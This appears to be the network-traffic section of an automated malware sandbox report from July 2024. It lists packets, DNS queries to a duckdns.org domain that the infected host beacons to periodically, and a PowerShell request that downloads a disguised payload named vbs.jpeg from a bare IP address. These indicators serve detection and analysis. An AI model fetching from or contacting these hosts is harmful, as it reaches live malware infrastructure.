Jul 27, 2024 13:31:17.597312927 CEST  49711        443        192.168.2.5      93.113.54.56
Jul 27, 2024 13:31:17.597332001 CEST  443          49711      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:17.597359896 CEST  443          49711      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:17.597385883 CEST  49711        443        192.168.2.5      93.113.54.56
Jul 27, 2024 13:31:17.597394943 CEST  49711        443        192.168.2.5      93.113.54.56
Jul 27, 2024 13:31:17.660931110 CEST  49711        443        192.168.2.5      93.113.54.56
Jul 27, 2024 13:31:22.064268112 CEST  49719        443        192.168.2.5      93.113.54.56
Jul 27, 2024 13:31:22.064311981 CEST  443          49719      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:22.064697027 CEST  49719        443        192.168.2.5      93.113.54.56
Jul 27, 2024 13:31:22.064925909 CEST  49719        443        192.168.2.5      93.113.54.56
Jul 27, 2024 13:31:22.064940929 CEST  443          49719      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:23.836182117 CEST  443          49719      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:23.845479965 CEST  49719        443        192.168.2.5      93.113.54.56
Jul 27, 2024 13:31:23.845494986 CEST  443          49719      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:24.608072996 CEST  443          49719      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:24.662261009 CEST  49719        443        192.168.2.5      93.113.54.56
Jul 27, 2024 13:31:24.662276983 CEST  443          49719      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:24.709147930 CEST  49719        443        192.168.2.5      93.113.54.56
Jul 27, 2024 13:31:24.726464033 CEST  443          49719      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:24.726478100 CEST  443          49719      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:24.726543903 CEST  49719        443        192.168.2.5      93.113.54.56
Jul 27, 2024 13:31:24.726557016 CEST  443          49719      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:24.726614952 CEST  443          49719      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:24.726641893 CEST  443          49719      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:24.726659060 CEST  49719        443        192.168.2.5      93.113.54.56
Jul 27, 2024 13:31:24.726659060 CEST  49719        443        192.168.2.5      93.113.54.56
Jul 27, 2024 13:31:24.726665974 CEST  443          49719      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:24.726690054 CEST  49719        443        192.168.2.5      93.113.54.56
Jul 27, 2024 13:31:24.727777958 CEST  443          49719      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:24.727833986 CEST  443          49719      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:24.727843046 CEST  49719        443        192.168.2.5      93.113.54.56
Jul 27, 2024 13:31:24.727865934 CEST  443          49719      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:24.727895021 CEST  443          49719      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:24.727921963 CEST  443          49719      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:24.727922916 CEST  49719        443        192.168.2.5      93.113.54.56
Jul 27, 2024 13:31:24.727951050 CEST  49719        443        192.168.2.5      93.113.54.56
Jul 27, 2024 13:31:24.771689892 CEST  49719        443        192.168.2.5      93.113.54.56
Jul 27, 2024 13:31:24.847914934 CEST  443          49719      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:24.847943068 CEST  443          49719      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:24.847986937 CEST  443          49719      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:24.848002911 CEST  49719        443        192.168.2.5      93.113.54.56
Jul 27, 2024 13:31:24.848021984 CEST  443          49719      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:24.848050117 CEST  49719        443        192.168.2.5      93.113.54.56
Jul 27, 2024 13:31:24.848057032 CEST  443          49719      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:24.848138094 CEST  49719        443        192.168.2.5      93.113.54.56
Jul 27, 2024 13:31:24.849046946 CEST  443          49719      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:24.849091053 CEST  443          49719      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:24.849112988 CEST  49719        443        192.168.2.5      93.113.54.56
Jul 27, 2024 13:31:24.849121094 CEST  443          49719      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:24.849149942 CEST  49719        443        192.168.2.5      93.113.54.56
Jul 27, 2024 13:31:24.849168062 CEST  49719        443        192.168.2.5      93.113.54.56
Jul 27, 2024 13:31:24.850639105 CEST  443          49719      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:24.850682020 CEST  443          49719      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:24.850703001 CEST  49719        443        192.168.2.5      93.113.54.56
Jul 27, 2024 13:31:24.850711107 CEST  443          49719      93.113.54.56     192.168.2.5
Jul 27, 2024 13:31:24.850745916 CEST  49719        443        192.168.2.5      93.113.54.56
Jul 27, 2024 13:31:24.851361990 CEST  49719        443        192.168.2.5      93.113.54.56
Jul 27, 2024 13:31:29.030497074 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:29.030587912 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:29.030688047 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:29.030980110 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:29.031016111 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:30.112077951 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:30.112163067 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:30.114813089 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:30.114826918 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:30.115089893 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:30.116262913 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:30.160511017 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:30.827311039 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:30.827363014 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:30.827406883 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:30.827438116 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:30.827496052 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:30.827519894 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:30.827539921 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:30.827624083 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:30.827662945 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:30.827692032 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:30.827703953 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:30.827721119 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:30.827740908 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:30.827753067 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:30.831502914 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:30.831547976 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:30.831577063 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:30.831589937 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:30.831608057 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:30.834340096 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:30.834391117 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:30.834414005 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:30.834427118 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:30.834439993 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:30.834450006 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:30.837475061 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:30.837515116 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:30.837574005 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:30.837588072 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:30.839607000 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:30.839653969 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:30.839668989 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:30.839679003 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:30.839711905 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:30.897543907 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:30.897608995 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:30.897634983 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:30.897655964 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:30.897672892 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:30.897695065 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:30.900703907 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:30.900748014 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:30.900774002 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:30.900787115 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:30.900809050 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:30.900825024 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:30.902218103 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:30.902264118 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:30.903671980 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:30.903716087 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:30.903738022 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:30.903745890 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:30.903770924 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:30.903785944 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:30.910698891 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:30.910742044 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:30.910768986 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:30.910779953 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:30.910806894 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:30.910819054 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:30.913429022 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:30.913490057 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:30.913496971 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:30.913505077 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:30.913527012 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:30.913542986 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:30.986778975 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:30.986804962 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:30.986902952 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:30.986927032 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:30.987093925 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:31.075845957 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:31.075912952 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:31.076057911 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:31.076057911 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:31.076085091 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:31.076195955 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:31.076280117 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:31.076323986 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:31.076349020 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:31.076363087 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:31.076380968 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:31.076397896 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:31.076997995 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:31.077040911 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:31.077055931 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:31.077064991 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:31.077099085 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:31.078850031 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:31.078906059 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:31.078933954 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:31.078944921 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:31.078959942 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:31.078986883 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:31.079550028 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:31.079591990 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:31.079617977 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:31.079626083 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:31.079652071 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:31.079664946 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:31.079898119 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:31.079940081 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:31.079961061 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:31.079967976 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:31.079996109 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:31.080007076 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:31.082570076 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:31.082614899 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:31.082643986 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:31.082655907 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:31.082678080 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:31.082732916 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:31.085632086 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:31.085674047 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:31.085702896 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:31.085714102 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:31.085726976 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:31.085746050 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:31.153358936 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:31.153398991 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:31.153635025 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:31.153700113 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:31.153768063 CEST  49720        443        192.168.2.5      34.166.62.190
Jul 27, 2024 13:31:31.156460047 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:31.156491041 CEST  443          49720      34.166.62.190    192.168.2.5
Jul 27, 2024 13:31:31.156533003 CEST  49720        443        192.168.2.5      34.166.62.190
                                                        Jul 27, 2024 13:31:31.156558037 CEST4434972034.166.62.190192.168.2.5
                                                        Jul 27, 2024 13:31:31.156584978 CEST49720443192.168.2.534.166.62.190
                                                        Jul 27, 2024 13:31:31.156615019 CEST49720443192.168.2.534.166.62.190
                                                        Jul 27, 2024 13:31:31.157341003 CEST4434972034.166.62.190192.168.2.5
                                                        Jul 27, 2024 13:31:31.157383919 CEST4434972034.166.62.190192.168.2.5
                                                        Jul 27, 2024 13:31:31.157419920 CEST49720443192.168.2.534.166.62.190
                                                        Jul 27, 2024 13:31:31.157439947 CEST4434972034.166.62.190192.168.2.5
                                                        Jul 27, 2024 13:31:31.157449961 CEST49720443192.168.2.534.166.62.190
                                                        Jul 27, 2024 13:31:31.157478094 CEST49720443192.168.2.534.166.62.190
                                                        Jul 27, 2024 13:31:31.160593987 CEST4434972034.166.62.190192.168.2.5
                                                        Jul 27, 2024 13:31:31.160651922 CEST4434972034.166.62.190192.168.2.5
                                                        Jul 27, 2024 13:31:31.160675049 CEST49720443192.168.2.534.166.62.190
                                                        Jul 27, 2024 13:31:31.160690069 CEST4434972034.166.62.190192.168.2.5
                                                        Jul 27, 2024 13:31:31.160702944 CEST49720443192.168.2.534.166.62.190
                                                        Jul 27, 2024 13:31:31.160722971 CEST49720443192.168.2.534.166.62.190
                                                        Jul 27, 2024 13:31:31.165750980 CEST4434972034.166.62.190192.168.2.5
                                                        Jul 27, 2024 13:31:31.165802956 CEST4434972034.166.62.190192.168.2.5
                                                        Jul 27, 2024 13:31:31.165827036 CEST49720443192.168.2.534.166.62.190
                                                        Jul 27, 2024 13:31:31.165841103 CEST4434972034.166.62.190192.168.2.5
                                                        Jul 27, 2024 13:31:31.165858030 CEST49720443192.168.2.534.166.62.190
                                                        Jul 27, 2024 13:31:31.165882111 CEST49720443192.168.2.534.166.62.190
                                                        Jul 27, 2024 13:31:31.168719053 CEST4434972034.166.62.190192.168.2.5
                                                        Jul 27, 2024 13:31:31.168770075 CEST4434972034.166.62.190192.168.2.5
                                                        Jul 27, 2024 13:31:31.168792009 CEST49720443192.168.2.534.166.62.190
                                                        Jul 27, 2024 13:31:31.168806076 CEST4434972034.166.62.190192.168.2.5
                                                        Jul 27, 2024 13:31:31.168828011 CEST49720443192.168.2.534.166.62.190
                                                        Jul 27, 2024 13:31:31.168842077 CEST49720443192.168.2.534.166.62.190
                                                        Jul 27, 2024 13:31:31.231838942 CEST4434972034.166.62.190192.168.2.5
                                                        Jul 27, 2024 13:31:31.231854916 CEST4434972034.166.62.190192.168.2.5
                                                        Jul 27, 2024 13:31:31.231923103 CEST49720443192.168.2.534.166.62.190
                                                        Jul 27, 2024 13:31:31.231944084 CEST4434972034.166.62.190192.168.2.5
                                                        Jul 27, 2024 13:31:31.232065916 CEST49720443192.168.2.534.166.62.190
                                                        Jul 27, 2024 13:31:31.234019041 CEST4434972034.166.62.190192.168.2.5
                                                        Jul 27, 2024 13:31:31.234033108 CEST4434972034.166.62.190192.168.2.5
                                                        Jul 27, 2024 13:31:31.234091043 CEST49720443192.168.2.534.166.62.190
                                                        Jul 27, 2024 13:31:31.234102011 CEST4434972034.166.62.190192.168.2.5
                                                        Jul 27, 2024 13:31:31.234148979 CEST49720443192.168.2.534.166.62.190
                                                        Jul 27, 2024 13:31:31.236129045 CEST4434972034.166.62.190192.168.2.5
                                                        Jul 27, 2024 13:31:31.236141920 CEST4434972034.166.62.190192.168.2.5
                                                        Jul 27, 2024 13:31:31.236197948 CEST49720443192.168.2.534.166.62.190
                                                        Jul 27, 2024 13:31:31.236207962 CEST4434972034.166.62.190192.168.2.5
                                                        Jul 27, 2024 13:31:31.236272097 CEST49720443192.168.2.534.166.62.190
                                                        Jul 27, 2024 13:31:31.243165016 CEST4434972034.166.62.190192.168.2.5
                                                        Jul 27, 2024 13:31:31.243177891 CEST4434972034.166.62.190192.168.2.5
                                                        Jul 27, 2024 13:31:31.243227959 CEST49720443192.168.2.534.166.62.190
                                                        Jul 27, 2024 13:31:31.243242025 CEST4434972034.166.62.190192.168.2.5
                                                        Jul 27, 2024 13:31:31.243283033 CEST49720443192.168.2.534.166.62.190
                                                        Jul 27, 2024 13:31:31.246840000 CEST4434972034.166.62.190192.168.2.5
                                                        Jul 27, 2024 13:31:31.246860981 CEST4434972034.166.62.190192.168.2.5
                                                        Jul 27, 2024 13:31:31.246912003 CEST49720443192.168.2.534.166.62.190
                                                        Jul 27, 2024 13:31:31.246927023 CEST4434972034.166.62.190192.168.2.5
                                                        Jul 27, 2024 13:31:31.246968031 CEST49720443192.168.2.534.166.62.190
                                                        Jul 27, 2024 13:31:31.248893976 CEST4434972034.166.62.190192.168.2.5
                                                        Jul 27, 2024 13:31:31.248944998 CEST4434972034.166.62.190192.168.2.5
                                                        Jul 27, 2024 13:31:31.248949051 CEST49720443192.168.2.534.166.62.190
                                                        Jul 27, 2024 13:31:31.248965025 CEST4434972034.166.62.190192.168.2.5
                                                        Jul 27, 2024 13:31:31.248990059 CEST4434972034.166.62.190192.168.2.5
                                                        Jul 27, 2024 13:31:31.249006033 CEST49720443192.168.2.534.166.62.190
                                                        Jul 27, 2024 13:31:31.249023914 CEST49720443192.168.2.534.166.62.190
                                                        Jul 27, 2024 13:31:31.249315977 CEST49720443192.168.2.534.166.62.190
                                                        Jul 27, 2024 13:31:38.437083006 CEST5748449706192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:31:38.439210892 CEST4970657484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:31:38.444314957 CEST5748449706192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:32:08.461842060 CEST5748449706192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:32:08.483849049 CEST4970657484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:32:08.492001057 CEST5748449706192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:32:38.485090017 CEST5748449706192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:32:38.493261099 CEST4970657484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:32:38.499980927 CEST5748449706192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:32:55.428411007 CEST4970980192.168.2.5178.237.33.50
                                                        Jul 27, 2024 13:32:55.818618059 CEST4970980192.168.2.5178.237.33.50
                                                        Jul 27, 2024 13:32:56.521739960 CEST4970980192.168.2.5178.237.33.50
                                                        Jul 27, 2024 13:32:57.818531036 CEST4970980192.168.2.5178.237.33.50
                                                        Jul 27, 2024 13:33:00.318492889 CEST4970980192.168.2.5178.237.33.50
                                                        Jul 27, 2024 13:33:05.209115028 CEST4970980192.168.2.5178.237.33.50
                                                        Jul 27, 2024 13:33:08.503058910 CEST5748449706192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:33:08.503493071 CEST4970657484192.168.2.5192.253.251.227
                                                        Jul 27, 2024 13:33:08.508512974 CEST5748449706192.253.251.227192.168.2.5
                                                        Jul 27, 2024 13:33:14.818490982 CEST4970980192.168.2.5178.237.33.50
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 27, 2024 13:31:03.157716036 CEST | 57620 | 53 | 192.168.2.5 | 1.1.1.1
Jul 27, 2024 13:31:03.284212112 CEST | 53 | 57620 | 1.1.1.1 | 192.168.2.5
Jul 27, 2024 13:31:05.440296888 CEST | 50120 | 53 | 192.168.2.5 | 1.1.1.1
Jul 27, 2024 13:31:05.450071096 CEST | 53 | 50120 | 1.1.1.1 | 192.168.2.5
Jul 27, 2024 13:31:14.016772032 CEST | 53736 | 53 | 192.168.2.5 | 1.1.1.1
Jul 27, 2024 13:31:14.106105089 CEST | 53 | 53736 | 1.1.1.1 | 192.168.2.5
Jul 27, 2024 13:31:28.852485895 CEST | 62890 | 53 | 192.168.2.5 | 1.1.1.1
Jul 27, 2024 13:31:29.029608965 CEST | 53 | 62890 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 27, 2024 13:31:03.157716036 CEST | 192.168.2.5 | 1.1.1.1 | 0x8100 | Standard query (0) | iwarsut775laudrye2.duckdns.org | A (IP address) | IN (0x0001) | false
Jul 27, 2024 13:31:05.440296888 CEST | 192.168.2.5 | 1.1.1.1 | 0xf6e8 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Jul 27, 2024 13:31:14.016772032 CEST | 192.168.2.5 | 1.1.1.1 | 0x4764 | Standard query (0) | asociatiatraditiimaria.ro | A (IP address) | IN (0x0001) | false
Jul 27, 2024 13:31:28.852485895 CEST | 192.168.2.5 | 1.1.1.1 | 0xd34f | Standard query (0) | new.quranushaiqer.org.sa | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 27, 2024 13:31:03.284212112 CEST | 1.1.1.1 | 192.168.2.5 | 0x8100 | No error (0) | iwarsut775laudrye2.duckdns.org | | 192.253.251.227 | A (IP address) | IN (0x0001) | false
Jul 27, 2024 13:31:05.450071096 CEST | 1.1.1.1 | 192.168.2.5 | 0xf6e8 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
Jul 27, 2024 13:31:09.411062956 CEST | 1.1.1.1 | 192.168.2.5 | 0x5ce1 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Jul 27, 2024 13:31:09.411062956 CEST | 1.1.1.1 | 192.168.2.5 | 0x5ce1 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Jul 27, 2024 13:31:14.106105089 CEST | 1.1.1.1 | 192.168.2.5 | 0x4764 | No error (0) | asociatiatraditiimaria.ro | | 93.113.54.56 | A (IP address) | IN (0x0001) | false
Jul 27, 2024 13:31:29.029608965 CEST | 1.1.1.1 | 192.168.2.5 | 0xd34f | No error (0) | new.quranushaiqer.org.sa | | 34.166.62.190 | A (IP address) | IN (0x0001) | false
                                                        • asociatiatraditiimaria.ro
                                                        • new.quranushaiqer.org.sa
                                                        • 198.46.176.133
                                                        • 104.168.45.34
                                                        • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 198.46.176.133 | 80 | 4432 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Jul 27, 2024 13:30:59.260989904 CEST | 79 | OUT | GET /Upload/vbs.jpeg HTTP/1.1
Host: 198.46.176.133
Connection: Keep-Alive
Jul 27, 2024 13:30:59.798891068 CEST | 1236 | IN | HTTP/1.1 200 OK
Date: Sat, 27 Jul 2024 11:30:59 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Wed, 10 Jul 2024 11:19:54 GMT
ETag: "1d7285-61ce2d35c4b0c"
Accept-Ranges: bytes
Content-Length: 1929861
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/jpeg
